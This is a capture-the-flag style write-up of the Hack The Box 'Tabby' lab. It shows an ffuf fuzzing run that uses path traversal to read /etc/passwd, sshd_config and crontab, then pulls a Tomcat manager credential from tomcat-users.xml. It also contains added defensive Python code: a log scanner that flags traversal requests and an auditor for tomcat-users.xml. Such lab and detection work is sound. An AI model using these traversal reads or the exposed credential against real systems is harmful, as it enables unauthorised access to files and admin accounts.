LFI


LFI is confirmed to be present in the web application running on target port 80. There is a system user named ash.

SSH


Unfortunately, the ash user does not have an SSH key.

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs/tabby]
└─$ ffuf -c -w /usr/share/wordlists/intruder/lfi.txt -u 'http://megahosting.htb/news.php?file=../../../../FUZZ' -ic -fw 1
________________________________________________
 
 :: Method           : GET
 :: URL              : http://megahosting.htb/news.php?file=../../../../FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/intruder/lfi.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________
[status: 200, Size: 246, Words: 23, Lines: 11, Duration: 198ms]
    * fuzz: /etc/hosts
 
[status: 200, Size: 473, Words: 72, Lines: 11, Duration: 100ms]
    * fuzz: /etc/fstab
 
[status: 200, Size: 7237, Words: 965, Lines: 228, Duration: 103ms]
    * fuzz: /etc/apache2/apache2.conf
 
[status: 200, Size: 1321, Words: 93, Lines: 56, Duration: 96ms]
    * fuzz: /proc/self/status
 
[status: 200, Size: 317, Words: 52, Lines: 2, Duration: 107ms]
    * fuzz: /proc/self/stat
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 113ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 246, Words: 23, Lines: 11, Duration: 111ms]
    * fuzz: /etc/hosts
 
[status: 200, Size: 1040, Words: 181, Lines: 22, Duration: 97ms]
    * fuzz: /etc/crontab
 
[status: 200, Size: 24, Words: 5, Lines: 3, Duration: 172ms]
    * fuzz: /etc/issue
 
[status: 200, Size: 144, Words: 17, Lines: 2, Duration: 159ms]
    * fuzz: /proc/version
 
[status: 200, Size: 107, Words: 4, Lines: 2, Duration: 159ms]
    * fuzz: /proc/cmdline
 
[status: 200, Size: 7237, Words: 965, Lines: 228, Duration: 99ms]
    * fuzz: /etc/apache2/apache2.conf
 
[status: 200, Size: 3299, Words: 296, Lines: 125, Duration: 100ms]
    * fuzz: /etc/ssh/sshd_config
 
[status: 200, Size: 85632, Words: 16, Lines: 59, Duration: 113ms]
    * fuzz: /var/log/wtmp
 
[status: 200, Size: 85632, Words: 16, Lines: 59, Duration: 99ms]
    * fuzz: /var/log/wtmp
 
[status: 200, Size: 317, Words: 52, Lines: 2, Duration: 101ms]
    * fuzz: /proc/self/stat
 
[status: 200, Size: 1317, Words: 93, Lines: 56, Duration: 104ms]
    * fuzz: /proc/self/status
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 99ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 1040, Words: 181, Lines: 22, Duration: 94ms]
    * fuzz: /etc/crontab
 
[status: 200, Size: 24, Words: 5, Lines: 3, Duration: 95ms]
    * fuzz: /etc/issue
 
[status: 200, Size: 246, Words: 23, Lines: 11, Duration: 95ms]
    * fuzz: /etc/hosts
 
[status: 200, Size: 144, Words: 17, Lines: 2, Duration: 126ms]
    * fuzz: /proc/version
 
[status: 200, Size: 107, Words: 4, Lines: 2, Duration: 126ms]
    * fuzz: /proc/cmdline
 
[status: 200, Size: 7237, Words: 965, Lines: 228, Duration: 101ms]
    * fuzz: /etc/apache2/apache2.conf
 
[status: 200, Size: 3299, Words: 296, Lines: 125, Duration: 99ms]
    * fuzz: /etc/ssh/sshd_config
 
[status: 200, Size: 317, Words: 52, Lines: 2, Duration: 97ms]
    * fuzz: /proc/self/stat
 
[status: 200, Size: 1317, Words: 93, Lines: 56, Duration: 99ms]
    * fuzz: /proc/self/status
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 130ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 106ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 246, Words: 23, Lines: 11, Duration: 98ms]
    * fuzz: /etc/hosts
 
[status: 200, Size: 24, Words: 5, Lines: 3, Duration: 100ms]
    * fuzz: /etc/issue
 
[status: 200, Size: 144, Words: 17, Lines: 2, Duration: 100ms]
    * fuzz: /proc/version
 
[status: 200, Size: 1040, Words: 181, Lines: 22, Duration: 100ms]
    * fuzz: /etc/crontab
 
[status: 200, Size: 107, Words: 4, Lines: 2, Duration: 100ms]
    * fuzz: /proc/cmdline
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 102ms]
    * fuzz: /etc/passwd
 
[status: 200, Size: 7237, Words: 965, Lines: 228, Duration: 100ms]
    * fuzz: /etc/apache2/apache2.conf
 
[status: 200, Size: 3299, Words: 296, Lines: 125, Duration: 95ms]
    * fuzz: /etc/ssh/sshd_config
 
[status: 200, Size: 85632, Words: 16, Lines: 59, Duration: 168ms]
    * fuzz: /var/log/wtmp
 
[status: 200, Size: 85632, Words: 16, Lines: 59, Duration: 106ms]
    * fuzz: /var/log/wtmp
 
[status: 200, Size: 1850, Words: 16, Lines: 36, Duration: 96ms]
    * fuzz: etc%2fpasswd
 
:: Progress: [1539/1539] :: Job [1/1] :: 312 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

While ffuf returned a lot of files, the access and error logs for Apache are nowhere to be found, as I was hoping to attempt log poisoning.
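Seen from the defending side, a run like the one above leaves a clear trail in the web server's access log. The following added example (not part of the original write-up) flags requests whose `file` parameter still contains traversal or an absolute path after repeated URL-decoding, which covers the `etc%2fpasswd` style of hit as well as double-encoded input. The log lines, IP addresses and function names are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined log format (not from the target).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 6507 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 1850 "-" "curl/8.0"
198.51.100.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?file=../../../../etc%2fpasswd HTTP/1.1" 200 1850 "-" "curl/8.0"
198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?file=%252e%252e%252f%252e%252e%252fetc%252fhosts HTTP/1.1" 200 246 "-" "curl/8.0"
198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.php?file=/proc/self/status HTTP/1.1" 200 1321 "-" "curl/8.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) (\d+|-)')

def fully_decode(value, max_rounds=5):
    """URL-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the decoded value climbs directories, is absolute, or has a NUL."""
    path = fully_decode(value).replace("\\", "/")
    return ".." in path.split("/") or path.startswith("/") or "\x00" in path

def find_lfi_attempts(log_text, param="file"):
    """Return (ip, decoded_value, status, bytes) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status, size = m.groups()
        query = urlsplit(target).query
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            if is_traversal(raw):
                hits.append((ip, fully_decode(raw), int(status),
                             0 if size == "-" else int(size)))
    return hits

def attempts_per_source(hits):
    """Count flagged requests per client IP to surface fuzzing bursts."""
    return Counter(ip for ip, *_ in hits)
```

A burst of flagged requests from one address within seconds, each answered with status 200 and a different body size, is the pattern worth alerting on.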

Tomcat


A Tomcat instance is running on the web server on port 8080.

Referring back to the default installation page, it would appear that the Tomcat instance is installed to the /usr/share/tomcat9 directory.

Further searching online reveals that the tomcat-users.xml file can be found in the /usr/share/tomcat9/etc directory, although the location varies between versions.

The /usr/share/tomcat9/etc/tomcat-users.xml file is located via LFI. The credential, tomcat:$3cureP4s5w0rd123!, is defined here with the admin-gui and manager-script roles.
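As a hardening check for the exposure described above, this added example (not from the original write-up or from Tomcat itself) audits a `tomcat-users.xml` file. It reports whether the file's mode lets accounts outside its owner and group read it, which is one way a PHP process could reach it, and which users hold Manager or Host Manager roles. The sample XML, its placeholder credentials and the function names are constructed assumptions.

```python
import stat
import xml.etree.ElementTree as ET

# Roles that grant access to the Manager / Host Manager applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}

# Constructed sample file; usernames and passwords are placeholders.
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="deployer" password="EXAMPLE-PLACEHOLDER"
        roles="admin-gui, manager-script"/>
  <user username="viewer" password="EXAMPLE-PLACEHOLDER-2" roles="manager-status"/>
</tomcat-users>
"""

def local(tag):
    """Strip the XML namespace so the check works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text, file_mode):
    """Return (subject, finding) tuples for a tomcat-users.xml and its mode bits."""
    findings = []
    # Any "other" read bit means every local account can read the credentials.
    if file_mode & stat.S_IROTH:
        findings.append(("file", "readable by accounts outside owner and group"))
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        if local(elem.tag) != "user":
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        risky = sorted(roles & PRIVILEGED_ROLES)
        if risky:
            findings.append((elem.get("username"), "holds " + ", ".join(risky)))
    return findings

if __name__ == "__main__":
    # On a real host, pass os.stat(path).st_mode instead of a literal mode.
    for subject, finding in audit_tomcat_users(SAMPLE_XML, 0o644):
        print(f"{subject}: {finding}")
```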